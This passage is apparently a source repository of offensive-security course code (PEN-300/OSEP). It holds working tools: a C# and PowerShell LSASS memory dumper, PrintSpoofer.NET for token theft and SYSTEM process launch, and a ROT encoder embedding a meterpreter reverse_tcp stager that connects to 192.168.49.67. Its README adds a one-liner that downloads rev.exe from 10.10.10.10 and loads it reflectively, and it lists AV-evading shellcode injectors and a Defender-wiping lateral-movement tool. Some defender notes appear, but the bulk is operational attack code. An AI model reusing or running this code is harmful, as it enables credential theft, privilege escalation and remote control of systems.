$result = $dbghelp::MiniDumpWriteDump($handle, $lsassPid, $dumpFile.Handle, 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
$dumpFile.Close()

if($result) {
Write-Host("Dumped LSASS memory to $filePath.")
}else {
Write-Host("Error dumping LSASS memory.")
}
--------------------------------------------------------------------------------
/MiniDump/MiniDump.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MiniDump", "MiniDump.csproj", "{595D5812-AA30-4EDE-95DA-8EDD7B8844BD}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.ActiveCfg = Debug|x64
19 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Debug|x64.Build.0 = Debug|x64
20 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.ActiveCfg = Release|x64
23 | {595D5812-AA30-4EDE-95DA-8EDD7B8844BD}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {32D0848B-922D-49BC-8B90-2F98D24BA0DD}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/MiniDump/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Runtime.InteropServices;
5 |
6 | namespace MiniDump
7 | {
/// <summary>
/// Writes a full-memory minidump of lsass.exe to disk via dbghelp!MiniDumpWriteDump.
/// </summary>
/// <remarks>
/// Defender notes: the handle open below (PROCESS_ALL_ACCESS on lsass.exe from a
/// non-system process) is the standard Sysmon Event ID 10 / ProcessAccess
/// detection, and a *.dmp appearing under C:\Windows\tasks is a simple
/// file-creation alert. With LSA protection (RunAsPPL) enabled the OpenProcess
/// call is denied for non-protected processes; with Credential Guard the
/// isolated secrets are not present in LSASS memory.
/// </remarks>
public class Program
{
    // MINIDUMP_TYPE value 2 = MiniDumpWithFullMemory.
    static int MiniDumpWithFullMemory = 2;
    static UInt32 PROCESS_ALL_ACCESS = 0x001F0FFF;

    // NOTE(review): no SetLastError = true here, so the Marshal.GetLastWin32Error()
    // call in Main is not guaranteed to reflect this function's failure.
    [DllImport("Dbghelp.dll")]
    static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);

    [DllImport("kernel32.dll")]
    static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

    /// <summary>
    /// Locates lsass.exe, opens it with PROCESS_ALL_ACCESS and dumps it to a
    /// hard-coded path. Arguments are ignored.
    /// </summary>
    /// <remarks>
    /// NOTE(review): lsass[0] throws IndexOutOfRangeException if no process is
    /// found; the handle returned by OpenProcess is not checked for IntPtr.Zero;
    /// the FileStream is never disposed, and the (empty) file is left behind
    /// when the dump fails.
    /// </remarks>
    public static void Main(string[] args)
    {
        // Get the PID of lsass.exe
        Process[] lsass = Process.GetProcessesByName("lsass");
        int lsass_pid = lsass[0].Id;
        Console.WriteLine($"Got lsass.exe PID: {lsass_pid}.");

        // Get a handle on LSASS
        IntPtr handle = OpenProcess(PROCESS_ALL_ACCESS, false, lsass_pid);
        Console.WriteLine($"Got a handle on lsass.exe: {handle}.");

        // Dump LSASS process to file
        // The file is created before the dump is attempted; DangerousGetHandle()
        // hands the raw OS handle to the native API without reference counting.
        string filePath = "C:\\Windows\\tasks\\lsass.dmp";
        FileStream dumpFile = new FileStream(filePath, FileMode.Create);
        bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
        if (dumped)
        {
            Console.WriteLine($"Dumped LSASS memory to {filePath}.");
        }
        else
        {
            // See the NOTE on the DllImport: this error code may be stale.
            Console.WriteLine($"Error dumping LSASS memory: {Marshal.GetLastWin32Error()}");
        }
    }
}
44 | }
--------------------------------------------------------------------------------
/MiniDump/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("MiniDump")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("MiniDump")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("595d5812-aa30-4ede-95da-8edd7b8844bd")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/PrintSpoofer.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C91C8B29-82DF-49C0-986B-81182CF84E42}
8 | Exe
9 | PrintSpoofer
10 | PrintSpoofer
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/PrintSpoofer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PrintSpoofer", "PrintSpoofer.csproj", "{C91C8B29-82DF-49C0-986B-81182CF84E42}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.ActiveCfg = Debug|x64
19 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Debug|x64.Build.0 = Debug|x64
20 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.ActiveCfg = Release|x64
23 | {C91C8B29-82DF-49C0-986B-81182CF84E42}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {4312EA9E-E161-4B69-A14B-2377CB32213A}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/PrintSpoofer.NET/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.Security.Principal;
4 | using System.Text;
5 |
6 | namespace PrintSpoofer
7 | {
/// <summary>
/// Named-pipe impersonation: creates a pipe, blocks until a client connects,
/// impersonates that client, duplicates its token into a primary token and
/// launches a binary with it. How a privileged client is made to connect is not
/// part of this program; the pipe name and binary are command-line arguments.
/// </summary>
/// <remarks>
/// Both ImpersonateNamedPipeClient (for a client at a higher integrity level)
/// and CreateProcessWithTokenW require SeImpersonatePrivilege, which is the
/// control point: service accounts that do not need it should not hold it.
/// Detection: process-creation auditing (Event ID 4688) records both the creator
/// subject and the new process's subject, which differ here; a named-pipe server
/// created by an unprivileged process that then spawns a SYSTEM child is the
/// behavioural signature.
/// </remarks>
public class Program
{
    // Win32 constants. NOTE(review): TOKENUSER is declared but never used, and
    // PIPE_TYPE_BYTE | PIPE_WAIT is 0 because both flags are 0.
    public static uint PIPE_ACCESS_DUPLEX = 0x3;
    public static uint PIPE_TYPE_BYTE = 0x0;
    public static uint PIPE_WAIT = 0x0;
    public static uint TOKEN_ALL_ACCESS = 0xF01FF;
    public static uint TOKENUSER = 1;
    public static uint SECURITY_IMPERSONATION = 2;
    public static uint TOKEN_PRIMARY = 1;

    // Output of CreateProcessWithTokenW: handles and ids of the new process/thread.
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }
    // Input to CreateProcessWithTokenW; cb must be set to the struct size (done in Main).
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public Int32 cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public Int32 dwX;
        public Int32 dwY;
        public Int32 dwXSize;
        public Int32 dwYSize;
        public Int32 dwXCountChars;
        public Int32 dwYCountChars;
        public Int32 dwFillAttribute;
        public Int32 dwFlags;
        public Int16 wShowWindow;
        public Int16 cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    // dwCreationFlags values; only UnicodeEnvironment is used below.
    public enum CreationFlags
    {
        DefaultErrorMode = 0x04000000,
        NewConsole = 0x00000010,
        NewProcessGroup = 0x00000200,
        SeparateWOWVDM = 0x00000800,
        Suspended = 0x00000004,
        UnicodeEnvironment = 0x00000400,
        ExtendedStartupInfoPresent = 0x00080000
    }
    // dwLogonFlags values; NetCredentialsOnly is implicitly 2.
    public enum LogonFlags
    {
        WithProfile = 1,
        NetCredentialsOnly
    }

    // Returns INVALID_HANDLE_VALUE (-1), not IntPtr.Zero, on failure.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateNamedPipe(string lpName, uint dwOpenMode, uint dwPipeMode, uint nMaxInstances, uint nOutBufferSize, uint nInBufferSize, uint nDefaultTimeOut, IntPtr lpSecurityAttributes);

    [DllImport("kernel32.dll")]
    static extern bool ConnectNamedPipe(IntPtr hNamedPipe, IntPtr lpOverlapped);

    [DllImport("Advapi32.dll")]
    static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentThread();

    [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcessWithTokenW(IntPtr hToken, LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    public extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool RevertToSelf();

    [DllImport("kernel32.dll")]
    static extern uint GetSystemDirectory([Out] StringBuilder lpBuffer, uint uSize);

    [DllImport("userenv.dll", SetLastError = true)]
    static extern bool CreateEnvironmentBlock(out IntPtr lpEnvironment, IntPtr hToken, bool bInherit);

    /// <summary>
    /// args[0] = pipe name (\\.\pipe\... form), args[1] = binary to launch with
    /// the impersonated client's token.
    /// </summary>
    /// <remarks>
    /// NOTE(review): none of the Win32 return values are acted on — `result`,
    /// `res` and `res1` are assigned and never read, and the handles are not
    /// checked — so every failure path still prints the final success message.
    /// The pipe and token handles are never closed.
    /// </remarks>
    public static void Main(string[] args)
    {
        // Parse arguments (pipe name)
        if (args.Length != 2)
        {
            Console.WriteLine("Please enter the pipe name to be used and the binary to trigger as arguments.\nExample: .\\PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\windows\\tasks\\bin.exe");
            return;
        }
        string pipeName = args[0];
        string binToRun = args[1];

        // Create our named pipe
        // Up to 10 instances, 4 KiB buffers each way, default timeout, default
        // security descriptor (lpSecurityAttributes = null).
        IntPtr hPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE | PIPE_WAIT, 10, 0x1000, 0x1000, 0, IntPtr.Zero);

        // Connect to our named pipe and wait for another client to connect
        // Blocking call (PIPE_WAIT, no OVERLAPPED); returns once a client connects.
        Console.WriteLine("Waiting for client to connect to named pipe...");
        bool result = ConnectNamedPipe(hPipe, IntPtr.Zero);

        // Impersonate the token of the incoming connection
        // Puts the client's impersonation token on this thread.
        result = ImpersonateNamedPipeClient(hPipe);

        // Open a handle on the impersonated token
        // OpenAsSelf = false: the access check for TOKEN_ALL_ACCESS is done as the
        // impersonated client.
        IntPtr tokenHandle;
        result = OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, false, out tokenHandle);

        // Duplicate the stolen token
        // Converts the impersonation token into a primary token (TOKEN_PRIMARY),
        // which is what CreateProcessWithTokenW requires.
        IntPtr sysToken = IntPtr.Zero;
        DuplicateTokenEx(tokenHandle, TOKEN_ALL_ACCESS, IntPtr.Zero, SECURITY_IMPERSONATION, TOKEN_PRIMARY, out sysToken);

        // Create an environment block for the non-interactive session
        IntPtr env = IntPtr.Zero;
        bool res = CreateEnvironmentBlock(out env, sysToken, false);

        // Report the identity this thread is currently impersonating, then end
        // impersonation on this thread. RevertToSelf only affects the thread's
        // impersonation token; the duplicated primary token in sysToken is unaffected.
        String name = WindowsIdentity.GetCurrent().Name;
        Console.WriteLine($"Impersonated user is: {name}.");
        RevertToSelf();

        // Get the system directory
        // Used below as the new process's working directory.
        StringBuilder sbSystemDir = new StringBuilder(256);
        uint res1 = GetSystemDirectory(sbSystemDir, 256);

        // Spawn a new process with the duplicated token, a desktop session, and the created profile
        // lpApplicationName is null, so binToRun is parsed as the full command line.
        PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();
        STARTUPINFO sInfo = new STARTUPINFO();
        sInfo.cb = Marshal.SizeOf(sInfo);
        sInfo.lpDesktop = "WinSta0\\Default";
        CreateProcessWithTokenW(sysToken, LogonFlags.WithProfile, null, binToRun, CreationFlags.UnicodeEnvironment, env, sbSystemDir.ToString(), ref sInfo, out pInfo);
        // NOTE(review): printed unconditionally; the call above may have failed.
        Console.WriteLine($"Executed '{binToRun}' with impersonated token!");
    }
}
146 | }
--------------------------------------------------------------------------------
/PrintSpoofer.NET/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PrintSpoofer.NET")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PrintSpoofer.NET")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c91c8b29-82df-49c0-986b-81182cf84e42")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # OSEP Code Snippets
2 | Code examples are provided as-is, without any form of warranty. Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course.
3 |
4 | Classes and methods are public, so most binaries should allow for reflective loading as below. Note that `"".Split()` yields a one-element array holding an empty string, so binaries that parse arguments (PrintSpoofer.NET expects exactly two, the encoders expect a number) need a real argument array instead, e.g. `[rev.Program]::Main(@('arg1','arg2'))`. Also be aware that the byte-array `Assembly.Load` overload is scanned by AMSI on .NET Framework 4.8 and later, so a reflectively loaded assembly is only as stealthy as its contents.
5 |
6 | ```powershell
7 | $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')
8 | $assem = [System.Reflection.Assembly]::Load($data)
9 | [rev.Program]::Main("".Split())
10 | ```
11 |
12 | ### Contents
13 | |Snippet Name|Description|
14 | |--|--|
15 | | AppLocker Bypass PowerShell Runspace (C#) | Base binary for an applocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.|
16 | | Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. |
17 | |Linux Shellcode Encoder (Python) | A utility script to encode C# payloads from Linux, automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.|
18 | |Linux Shellcode Loaders (C) |Various C-based shellcode loaders, including base binaries for library hijacking.|
19 | |MiniDump (C# & PS1) |A simple binary to Dump LSASS to `C:\Windows\Tasks\lsass.dmp`. Also provided as native PowerShell script.|
20 | |MSSQL (C#)|An example binary that includes a variety of discussed MSSQL interactions. Change the code to include only what you need.|
21 | |PrintSpoofer.NET (C#)|Steals the token of the incoming authentication forced with the [PrintSpooler exploit](https://github.com/leechristensen/SpoolSample), and uses that token to run a given binary. Modified to not require an interactive logon session. Takes exactly two arguments: the pipe name and the binary to run.|
22 | |ROT Shellcode Encoder (C#)|A simple binary to apply state-of-the-art ROT encoding to obfuscate the shellcode. It takes a single integer argument: the value added to each byte (mod 256). Decode by subtracting the same value mod 256 — the commented-out decode loop in the source hard-codes `37`, so change it to match the value you used.|
23 | |Sections Shellcode Process Injector (C#)|Injects and runs shellcode using `NtCreateSection`, `NtMapViewOfSection`, `NtUnMapViewOfsection` and `NtClose` instead of the "standard" method.|
24 | |Shellcode Process Hollowing (C#)|Hollows a `svchost` process and runs the shellcode from there. Scores 0/68 on VirusTotal at the time of writing.|
25 | |Shellcode Process Injector (C# & PS1) | Simple shellcode runner that applies process injection. Accepts an argument for the process to inject into. If no argument is given, it attempts to pick a suitable process based on privilege level. Also provided as native PowerShell script (though it is a bit simpler).|
26 | |Simple Shellcode Runner (C# & PS1 & VBA)|The simplest of shellcode runners. Also provided as native PowerShell and VBA scripts.|
27 | |XOR Shellcode Encoder (C#)|A simple binary to apply state-of-the-art XOR encoding to obfuscate the shellcode.|
28 |
29 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace ConsoleApp2
8 | {
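class Program
{
    /// <summary>
    /// Applies a byte-wise additive ("ROT") transform: every output byte is
    /// (input + rotNo) mod 256. The inverse is subtracting the same value mod 256.
    /// The input array is left untouched; a new array is returned.
    /// </summary>
    /// <param name="data">Bytes to encode; may be empty.</param>
    /// <param name="rotNo">Value added to each byte. Any int is accepted and is effectively reduced mod 256, so negative values rotate backwards and 256 is a no-op.</param>
    /// <returns>A new array of the same length holding the encoded bytes.</returns>
    /// <exception cref="ArgumentNullException">If <paramref name="data"/> is null.</exception>
    public static byte[] Encode(byte[] data, int rotNo)
    {
        if (data == null)
        {
            throw new ArgumentNullException(nameof(data));
        }

        byte[] encoded = new byte[data.Length];
        for (int i = 0; i < data.Length; i++)
        {
            // 'uint + int' promotes to long, so a negative rotNo wraps correctly before the mask.
            encoded[i] = (byte)(((uint)data[i] + rotNo) & 0xFF);
        }
        return encoded;
    }

    /// <summary>
    /// Entry point: ROT-encodes the embedded msfvenom stager with the rotation given as the
    /// first argument and prints a C# byte array plus the matching decode loop.
    /// The embedded bytes are a live reverse_tcp stager with a lab LHOST baked in — regenerate
    /// them with the msfvenom command in the comment before real use.
    /// </summary>
    static void Main(string[] args)
    {
        // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.67 LPORT=443 EXITFUNC=thread -f csharp
        byte[] buf = new byte[511] {
        0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
        0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,
        0x52,0x20,0x56,0x48,0x0f,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,
        0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0xe2,0xed,0x52,0x48,0x8b,0x52,0x20,0x41,0x51,0x8b,0x42,0x3c,0x48,
        0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
        0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x44,0x8b,
        0x40,0x20,0x49,0x01,0xd0,0x50,0x8b,0x48,0x18,0xe3,0x56,0x4d,0x31,0xc9,0x48,
        0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
        0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
        0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
        0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
        0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
        0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
        0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,
        0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,
        0x49,0xbc,0x02,0x00,0x01,0xbb,0xc0,0xa8,0x31,0x43,0x41,0x54,0x49,0x89,0xe4,
        0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,
        0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,
        0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,
        0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
        0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,
        0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,
        0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,
        0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,
        0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,
        0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,
        0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,
        0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,
        0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,
        0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,
        0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,
        0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,
        0xff,0xe7,0x58,0x6a,0x00,0x59,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0x89,0xda,0xff,
        0xd5 };

        // int.Parse would throw an unhandled FormatException on junk input; fail with the usage text instead.
        int rotNo;
        if (args.Length == 0 || !int.TryParse(args[0], out rotNo))
        {
            System.Console.WriteLine("Please enter a numeric argument for the number of rotations.");
            return;
        }

        // Rotation reduced to 0..255; this is the value the decoder has to subtract.
        int effective = ((rotNo % 256) + 256) % 256;
        if (effective == 0)
        {
            Console.WriteLine("WARNING: a rotation of 0 (mod 256) leaves the shellcode unchanged - the output is the plaintext stager.");
        }

        byte[] encoded = Encode(buf, rotNo);
        string hex = string.Join(", ", encoded.Select(b => $"0x{b:x2}"));

        Console.WriteLine($"ROT{rotNo} payload:");
        Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{ {hex} }};");

        // Print a decode loop that already carries the right value, so it cannot drift from the encoding.
        Console.WriteLine();
        Console.WriteLine("// Decode the payload (subtracts the rotation used above):");
        Console.WriteLine("for (int i = 0; i < buf.Length; i++)");
        Console.WriteLine("{");
        Console.WriteLine($"    buf[i] = (byte)(((uint)buf[i] - {effective}) & 0xFF);");
        Console.WriteLine("}");
    }
}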
93 | }
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ROT Shellcode Encoder")]
9 | [assembly: AssemblyDescription("")]
